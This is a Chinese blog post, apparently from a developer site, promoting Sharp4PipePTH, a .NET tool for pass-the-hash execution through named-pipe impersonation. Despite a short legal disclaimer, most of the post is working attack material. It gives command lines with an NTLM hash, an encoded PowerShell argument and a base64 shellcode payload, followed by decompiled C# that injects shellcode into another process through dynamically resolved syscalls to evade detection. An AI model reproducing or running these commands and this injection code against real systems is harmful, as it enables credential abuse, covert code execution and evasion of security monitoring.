.NET 一款通过管道模拟传递哈希的工具

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4PipePTH 是一个用于通过管道模拟和传递哈希值,从而实现以其他用户身份运行二进制文件的工具。这种技术被广泛用于渗透测试和内网攻击场景,通过传递哈希值而非明文密码来实现对目标系统的控制。该工具能够有效利用管道进行模拟,因此可以绕过某些安全检测机制。

图片

03使用方法

Sharp4PipePTH 提供了两种主要的运行方式,具体来说,可以通过命令行指定用户名、内网域的名称、哈希值以及要运行的二进制文件路径和参数来执行操作。

Sharp4PipePTH.exe username:Administrator domain:localhost hash:31d6cfe0d16ae931b73c59d7e0c089c0 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

另外一种可以通过指定用户名、内网域的名称、哈希值并传递Base64编码的Shellcode来执行命令。具体如下所示。

Sharp4PipePTH.exe username:Administrator domain:localhost hash:31d6cfe0d16ae931b73c59d7e0c089c0 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

04原理解析

在处理Shellcode的执行时,Sharp4PipePTH 首先通过以下代码将Base64编码的Shellcode转换为字节数组,然后在新线程中调用ImpersonateClient方法,执行模拟和代码注入操作

bool flag14 = shellcodegiven;
if (flag14)
{
    byte[] shellcodebytes = Convert.FromBase64String(shellcode);
    Thread t = new Thread(delegate()
    {
        PipeServerImpersonate.ImpersonateClient(pipename, binary, shellcodebytes, Args);
    });
    t.Start();
}

ImpersonateClient 方法是工具的核心,通过创建命名管道并将安全描述符设置为允许所有用户访问,从而实现客户端的模拟,具体代码如下

public static void ImpersonateClient(string PipeName, string Binary, byte[] shellcodebytes, string args)
{
    PipeServerImpersonate.SECURITY_ATTRIBUTES securityAttributes = default(PipeServerImpersonate.SECURITY_ATTRIBUTES);
    string pipename = string.Format("\\\\.\\pipe\\{0}", PipeName);
    Console.WriteLine("Create Named Pipe: " + pipename);
    PipeServerImpersonate.ConvertStringSecurityDescriptorToSecurityDescriptor("D:(A;OICI;GA;;;WD)", 1U, out securityAttributes.lpSecurityDescriptor, IntPtr.Zero);
    IntPtr hPipe = PipeServerImpersonate.CreateNamedPipeW(string.Format("\\\\.\\{0}", pipename), 1073741827, 0, 10, 2048, 2048, 0, ref securityAttributes);
}

在这个过程中,工具使用了多个NT API函数,通过动态获取系统调用的方式来分配内存、写入Shellcode、保护内存以及创建新线程来执行代码。

DynamicInvokation.Native.NTSTATUS statusresult = ntOpenProcess(ref hProcess, 2035711U, ref oa, ref ci);
stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtAllocateVirtualMemory");
PipeServerImpersonate.NtAllocateVirtualMemory ntAllocateVirtualMemory = (PipeServerImpersonate.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtAllocateVirtualMemory));
IntPtr baseAddress = IntPtr.Zero;
IntPtr regionSize = (IntPtr)shellcodebytes.Length;
statusresult = ntAllocateVirtualMemory(hProcess, ref baseAddress, IntPtr.Zero, ref regionSize, 12288U, 4U);

stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtWriteVirtualMemory");
PipeServerImpersonate.NtWriteVirtualMemory ntWriteVirtualMemory = (PipeServerImpersonate.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtWriteVirtualMemory));
IntPtr buffer = Marshal.AllocHGlobal(shellcodebytes.Length);
Marshal.Copy(shellcodebytes, 0, buffer, shellcodebytes.Length);
uint bytesWritten = 0U;
statusresult = ntWriteVirtualMemory(hProcess, baseAddress, buffer, (uint)shellcodebytes.Length, ref bytesWritten);

stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtProtectVirtualMemory");
PipeServerImpersonate.NtProtectVirtualMemory ntProtectVirtualMemory = (PipeServerImpersonate.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtProtectVirtualMemory));
uint oldProtect = 0U;
statusresult = ntProtectVirtualMemory(hProcess, ref baseAddress, ref regionSize, 32U, ref oldProtect);

stub = DynamicInvokation.DynamicGeneric.GetSyscallStub("NtCreateThreadEx");
PipeServerImpersonate.NtCreateThreadEx ntCreateThreadEx = (PipeServerImpersonate.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(PipeServerImpersonate.NtCreateThreadEx));
IntPtr hThread = IntPtr.Zero;
statusresult = ntCreateThreadEx(out hThread, DynamicInvokation.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, hProcess, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);

通过这种方式,Sharp4PipePTH 成功将Shellcode注入到目标进程中,并实现了代码的远程执行,如下图所示。

图片

综上,Sharp4PipePTH 常用于模拟不同用户的身份执行命令,如在渗透测试中通过哈希传递技术来绕过用户身份验证,执行特权命令。这种方式不仅可以隐蔽地执行操作,还能规避多种安全监控措施。

05.NET安全知识库

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题。

图片

图片

星球文化20+个专题栏目涵盖了点、线、面、体等知识面!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

    

图片

图片

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值